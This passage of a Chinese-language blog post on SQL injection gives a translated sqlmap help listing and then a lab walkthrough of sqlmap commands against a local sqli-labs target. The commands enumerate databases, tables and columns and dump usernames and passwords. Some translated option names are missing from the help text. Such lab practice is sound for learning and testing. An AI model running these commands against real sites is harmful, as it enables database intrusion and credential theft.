<p>kali自带sqlmap</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -h  </span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224111055679.png" alt="image-20231224111055679"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line">使用方法： python3 sqlmap [options] 选项</span><br><span class="line"></span><br><span class="line">选项：</span><br><span class="line">  -h、--help 显示基本帮助信息并退出</span><br><span class="line">  -hh 显示高级帮助信息并退出</span><br><span class="line">  --显示程序的版本号并退出</span><br><span class="line">  显示程序版本号并退出 -v VERBOSE 有效度级别：0-6（默认 1）</span><br><span class="line"></span><br><span class="line">  目标：</span><br><span class="line">    必须至少提供其中一个选项才能定义</span><br><span class="line">    目标</span><br><span class="line"></span><br><span class="line">    -u URL, --url=URL 目标 URL（例如，&quot;http://www.site.com/vuln.php?id=1&quot;）</span><br><span class="line">    -g GOOGLEDORK 将 Google dork 结果作为目标 URL 处理</span><br><span class="line"></span><br><span class="line">  请求：</span><br><span class="line">    这些选项可用于指定如何连接目标 URL</span><br><span class="line"></span><br><span class="line">    --data=DATA通过 POST 发送的数据字符串（例如 &quot;id=1）</span><br><span class="line">    --cookie=COOKIE HTTP Cookie 头值（例如 &quot;PHPSESSID=a8d127e...&quot;）</span><br><span class="line">    --使用随机选择的 HTTP User-Agent 头值</span><br><span class="line">    --proxy=PROXY使用代理连接目标 URL</span><br><span class="line">    --tor使用 Tor 匿名网络</span><br><span class="line">    --检查 Tor 是否正确使用</span><br><span class="line"></span><br><span class="line">  注入：</span><br><span class="line">    这些选项可用于指定要测试的参数、</span><br><span class="line">    提供自定义注入有效载荷和可选篡改脚本</span><br><span class="line"></span><br><span class="line">    -p TESTPARAMETER 可测试参数</span><br><span class="line">    --dbms=DBMS 将后端 DBMS 强化为提供的值</span><br><span class="line"></span><br><span class="line">  检测：</span><br><span class="line">    这些选项可用于自定义检测阶段</span><br><span class="line"></span><br><span class="line">    --level=LEVEL（级别） 执行测试的级别（1-5，默认为 1</span><br><span class="line">    --risk=RISK（风险） 要执行测试的风险（1-3，默认为 1</span><br><span class="line"></span><br><span class="line">  技术：</span><br><span class="line">    这些选项可用于调整特定 SQL 注入技术的测试</span><br><span class="line">    技术</span><br><span class="line"></span><br><span class="line">    --technique=技术  要使用的 SQL 注入技术（默认为 &quot;BEUSTQ）</span><br><span class="line"></span><br><span class="line">  枚举：</span><br><span class="line">    这些选项可用于枚举后端数据库</span><br><span class="line">    管理系统的信息、结构和数据。</span><br><span class="line">    表</span><br><span class="line"></span><br><span class="line">    -a、--all 检索所有内容</span><br><span class="line">    -b，--横幅 检索 DBMS 横幅</span><br><span class="line">    --current-user（当前用户） 检索 DBMS 当前用户</span><br><span class="line">    --检索 DBMS 当前数据库</span><br><span class="line">    --passwords 枚举 DBMS 用户密码哈希值</span><br><span class="line">    --dbs 枚举 DBMS 数据库</span><br><span class="line">    --表 枚举 DBMS 数据库表</span><br><span class="line">    --columns 枚举 DBMS 数据库表列</span><br><span class="line">    --模式 枚举 DBMS 模式</span><br><span class="line">    --dump 转储 DBMS 数据库表项</span><br><span class="line">    --dump-all 转储所有 DBMS 数据库表项</span><br><span class="line">    -DB DBMS 数据库要枚举的数据库</span><br><span class="line">    -T TBL 要枚举的 DBMS 数据库表</span><br><span class="line">    -C COL 要枚举的 DBMS 数据库表列</span><br><span class="line"></span><br><span class="line">  操作系统访问：</span><br><span class="line">    这些选项可用于访问后端数据库管理系统底层操作系统。</span><br><span class="line">    系统底层操作系统</span><br><span class="line"></span><br><span class="line">    --os-shell 提示交互式操作系统 shell</span><br><span class="line">    --os-pwn 提示使用 OOB shell、Meterpreter 或 VNC</span><br><span class="line"></span><br><span class="line">  常规：</span><br><span class="line">    这些选项可用于设置一些常规工作参数</span><br><span class="line"></span><br><span class="line">    --batch 绝不要求用户输入，使用默认行为</span><br><span class="line">    --为当前目标刷新会话文件</span><br><span class="line"></span><br><span class="line">  杂项：</span><br><span class="line">    这些选项不属于任何其他类别</span><br><span class="line"></span><br><span class="line">    --wizard（向导） 面向初学者的简单向导界面</span><br><span class="line"></span><br><span class="line">[!] 查看使用&quot;-hh &quot;运行的全部选项列表</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">爆库：</span><br><span class="line">1.所有库:sqlmap -u &quot;http://192.168.233.132/sqli/Less-9/?id=1&quot; --dbs</span><br><span class="line">2.当前库：sqlmap -u &quot;http://192.168.233.132/sqli/Less-9/?id=1&quot; --current-db</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224141039578.png" alt="image-20231224141039578"></p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224141158703.png" alt="image-20231224141158703"></p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224141949792.png" alt="image-20231224141949792"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">爆表：sqlmap -u &quot;http://192.168.233.132/sqli/Less-9/?id=1&quot; --batch -D security --tables</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224142312642.png" alt="image-20231224142312642"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">爆字段：sqlmap -u &quot;http://192.168.233.132/sqli/Less-9/?id=1&quot; --batch -D security -T users --column</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224142642406.png" alt="image-20231224142642406"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">爆数据：sqlmap -u &quot;http://192.168.233.132/sqli/Less-9/?id=1&quot; --batch -D security -T users -C &quot;id,password,username&quot; --dump</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224142921373.png" alt="image-20231224142921373"></p>

      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="http://example.com/2023/12/20/sql%E6%B3%A8%E5%85%A5/" title="sql注入" target="_blank" rel="external">http://example.com/2023/12/20/sql注入/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/hkbijihxl" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/hkbijihxl" target="_blank"><span class="text-dark">hkbijihxl</span><small class="ml-1x">汀花雨细，水树风闲，又是秋来。</small></a></h3>
        <div>个人简介。</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    
    <li class="next">
      <a href="/2023/12/16/PHP/" title="PHP"><span>Older&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
  </ul>
  
  
  <!-- Button trigger modal -->
  <button type="button" class="btn btn-fancy btn-donate pop-onhover bg-gradient-warning" data-toggle="modal" data-target="#donateModal"><span>$</span></button>
  <!-- <div class="wave-icon wave-icon-danger btn-donate" data-toggle="modal" data-target="#donateModal">
    <div class="wave-circle"><span class="icon"><i class="icon icon-bill"></i></span></div>
  </div> -->
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  
<!-- Modal -->
<div class="modal modal-center modal-small modal-xs-full fade" id="donateModal" tabindex="-1" role="dialog">
  <div class="modal-dialog" role="document">
    <div class="modal-content donate">
      <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
      <div class="modal-body">
        <div class="donate-box">
          <div class="donate-head">
            <p>Maybe you could buy me a cup of coffee.</p>
          </div>
          <div class="tab-content">
            <div role="tabpanel" class="tab-pane fade active in" id="alipay">
              <div class="donate-payimg">
                <img src="/images/donate/alipayimg.png" alt="Scan Qrcode" title="Scan" />
              </div>
              <p class="text-muted mv">Scan this qrcode</p>
              <p class="text-grey">Open alipay app scan this qrcode, buy me a coffee!</p>
            </div>
            <div role="tabpanel" class="tab-pane fade" id="wechatpay">
              <div class="donate-payimg">
                <img src="/images/donate/wechatpayimg.png" alt="Scan Qrcode" title="Scan" />
              </div>
              <p class="text-muted mv">Scan this qrcode</p>
              <p class="text-grey">Open wechat app scan this qrcode, buy me a coffee!</p>
            </div>
          </div>
          <div class="donate-footer">
            <ul class="nav nav-tabs nav-justified" role="tablist">
              <li role="presentation" class="active">
                <a href="#alipay" id="alipay-tab" role="tab" data-toggle="tab" aria-controls="alipay" aria-expanded="true"><i class="icon icon-alipay"></i> alipay</a>
              </li>
              <li role="presentation" class="">
                <a href="#wechatpay" role="tab" id="wechatpay-tab" data-toggle="tab" aria-controls="wechatpay" aria-expanded="false"><i class="icon icon-wepay"></i> wechat payment</a>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>



</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/hkbijihxl" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="https://weibo.com/u/7832381828" target="_blank" title="Weibo" data-toggle=tooltip data-placement=top><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="https://twitter.com/iwebued" target="_blank" title="Twitter" data-toggle=tooltip data-placement=top><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="https://www.behance.net/cofess" target="_blank" title="Behance" data-toggle=tooltip data-placement=top><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   




   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: false,
    appId: '',
    appKey: '',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: meta,
    pageSize: '10' || 10,
    visitor: false
  });
  </script>

     







</body>
</html>